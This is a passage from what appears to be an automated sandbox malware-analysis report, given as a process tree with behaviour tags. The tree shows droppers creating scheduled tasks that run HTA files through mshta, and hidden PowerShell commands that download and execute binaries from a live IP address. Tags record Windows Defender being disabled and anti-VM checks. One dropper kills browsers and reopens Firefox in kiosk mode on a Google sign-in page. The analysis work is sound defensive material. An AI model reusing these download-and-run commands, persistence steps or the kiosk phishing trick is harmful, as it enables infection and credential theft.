                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2908 /prefetch:2
                                                                                                                                            5⤵
                                                                                                                                              PID:4360
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2408 /prefetch:2
                                                                                                                                              5⤵
                                                                                                                                                PID:6584
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
                                                                                                                                                5⤵
                                                                                                                                                • Uses browser remote debugging
                                                                                                                                                PID:1524
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
                                                                                                                                                5⤵
                                                                                                                                                • Uses browser remote debugging
                                                                                                                                                PID:5680
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4940 /prefetch:2
                                                                                                                                                5⤵
                                                                                                                                                  PID:5592
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11213457285478480972,15621452864545561941,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2396 /prefetch:2
                                                                                                                                                  5⤵
                                                                                                                                                    PID:3468
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                  4⤵
                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                  PID:6416
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffad7d846f8,0x7ffad7d84708,0x7ffad7d84718
                                                                                                                                                    5⤵
                                                                                                                                                      PID:3784
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,17586384166883959547,11223780387155007089,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:2
                                                                                                                                                      5⤵
                                                                                                                                                        PID:6396
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,17586384166883959547,11223780387155007089,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
                                                                                                                                                        5⤵
                                                                                                                                                          PID:1140
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,17586384166883959547,11223780387155007089,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3584
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1948,17586384166883959547,11223780387155007089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
                                                                                                                                                            5⤵
                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                            PID:5160
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1948,17586384166883959547,11223780387155007089,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                                                                                                                                                            5⤵
                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                            PID:5136
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,17586384166883959547,11223780387155007089,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1984 /prefetch:2
                                                                                                                                                            5⤵
                                                                                                                                                              PID:6004
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,17586384166883959547,11223780387155007089,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1952 /prefetch:2
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4464
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1091562101\ca42af01a5.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1091562101\ca42af01a5.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:5300
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn MVeWUmaW28Y /tr "mshta C:\Users\Admin\AppData\Local\Temp\lXdwH4yCt.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5560
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /create /tn MVeWUmaW28Y /tr "mshta C:\Users\Admin\AppData\Local\Temp\lXdwH4yCt.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                5⤵
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:3568
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              mshta C:\Users\Admin\AppData\Local\Temp\lXdwH4yCt.hta
                                                                                                                                                              4⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              PID:5360
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FG1MDSETHXIPMQTT4XE9FDFG3OOQZLEI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                                                                                                                                                5⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5636
                                                                                                                                                                • C:\Users\Admin\AppData\Local\TempFG1MDSETHXIPMQTT4XE9FDFG3OOQZLEI.EXE
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\TempFG1MDSETHXIPMQTT4XE9FDFG3OOQZLEI.EXE"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                  • Modifies Windows Defender TamperProtection settings
                                                                                                                                                                  • Modifies Windows Defender notification settings
                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                  • Windows security modification
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:5520
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091563021\am_no.cmd" "
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:4704
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091563021\am_no.cmd" any_word
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:1860
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /t 2
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:5304
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5460
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:3768
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:4212
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:5004
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:1764
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:5484
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /create /tn "egWCTma4Rgs" /tr "mshta \"C:\Temp\cvGPqszlK.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:5776
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                mshta "C:\Temp\cvGPqszlK.hta"
                                                                                                                                                                5⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5760
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  • Downloads MZ/PE file
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:3780
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:992
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1091564001\ea03dbc82d.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1091564001\ea03dbc82d.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5452
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1091565001\62457e5dde.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1091565001\62457e5dde.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5160
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1091566001\64c897921b.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1091566001\64c897921b.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:332
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1091567001\69a840d06d.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1091567001\69a840d06d.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:5316
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /F /IM firefox.exe /T
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2916
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /F /IM chrome.exe /T
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5300
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /F /IM msedge.exe /T
                                                                                                                                                              4⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2576
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /F /IM opera.exe /T
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5520
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /F /IM brave.exe /T
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:1552
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5868
                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:5664
                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1924 -parentBuildID 20240401114208 -prefsHandle 1840 -prefMapHandle 1832 -prefsLen 27454 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66aa562c-ec71-4252-91a0-05dc920b2c4e} 5664 "\\.\pipe\gecko-crash-server-pipe.5664" gpu
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:1644
                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2400 -parentBuildID 20240401114208 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 28374 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4dfd14a5-1951-4114-b381-1f23165fb2ac} 5664 "\\.\pipe\gecko-crash-server-pipe.5664" socket
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:4240
                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3400 -childID 1 -isForBrowser -prefsHandle 3340 -prefMapHandle 3364 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be6bdfa6-ea6d-49b8-a008-f37d02adf3f0} 5664 "\\.\pipe\gecko-crash-server-pipe.5664" tab
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:5824
                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3048 -childID 2 -isForBrowser -prefsHandle 3752 -prefMapHandle 3748 -prefsLen 32864 -prefMapSize 244658 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd06439b-6214-4e31-9067-da89269d8e11} 5664 "\\.\pipe\gecko-crash-server-pipe.5664" tab
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:5924
                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4232 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4296 -prefMapHandle 4292 -prefsLen 32864 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1bad4828-fb74-4e69-b488-56a110cbb5fe} 5664 "\\.\pipe\gecko-crash-server-pipe.5664" utility
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            PID:6740
                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5236 -childID 3 -isForBrowser -prefsHandle 5228 -prefMapHandle 5224 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c75e3756-1b08-4ca4-ae0c-79f89fd48aa5} 5664 "\\.\pipe\gecko-crash-server-pipe.5664" tab
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:6436
                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 4 -isForBrowser -prefsHandle 5376 -prefMapHandle 5380 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5eb3ca06-5c21-4185-8e09-555aefcf6aaa} 5664 "\\.\pipe\gecko-crash-server-pipe.5664" tab
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:6448
                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5572 -childID 5 -isForBrowser -prefsHandle 5580 -prefMapHandle 5548 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3408d9d8-603f-489d-8115-d443cd776961} 5664 "\\.\pipe\gecko-crash-server-pipe.5664" tab
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6472
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1091568001\f6b0ab8123.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1091568001\f6b0ab8123.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:5324
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn XSr2tmakm7f /tr "mshta C:\Users\Admin\AppData\Local\Temp\b4LPDduPw.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:3512
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
